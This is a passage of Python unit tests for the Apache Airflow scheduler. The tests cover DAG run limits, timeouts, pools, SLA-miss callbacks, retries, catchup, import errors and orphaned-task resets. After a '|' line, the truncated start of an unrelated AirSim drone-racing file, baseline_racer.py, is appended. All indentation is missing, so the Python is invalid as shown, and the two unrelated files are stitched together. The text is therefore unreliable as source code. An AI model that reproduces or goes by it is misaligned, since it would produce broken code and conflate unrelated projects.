scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue,
# but tasks stay in the executor.queued_tasks after executor.heartbeat()
# will be set back to SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.RUNNING)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
# 5s to wait for child process to exit, 1s dummy sleep
# in scheduler loop to prevent excessive logs and 1s for last loop to finish.
self.assertLess(run_duration - expected_run_duration, 6.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception as _:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
baseline_racer.py | from argparse import ArgumentParser
import airsimdroneracinglab as airsim
import cv2
import threading
import time
import utils
import numpy as np
import math
# drone_name should match the name in ~/Document/AirSim/settings.json
class BaselineRacer(object):
def __init__(
self,
drone_name="drone_1",
viz_traj=True,
viz_traj_color_rgba=[1.0, 0.0, 0.0, 1.0],
viz_image_cv2=True,
):
self.drone_name = drone_name
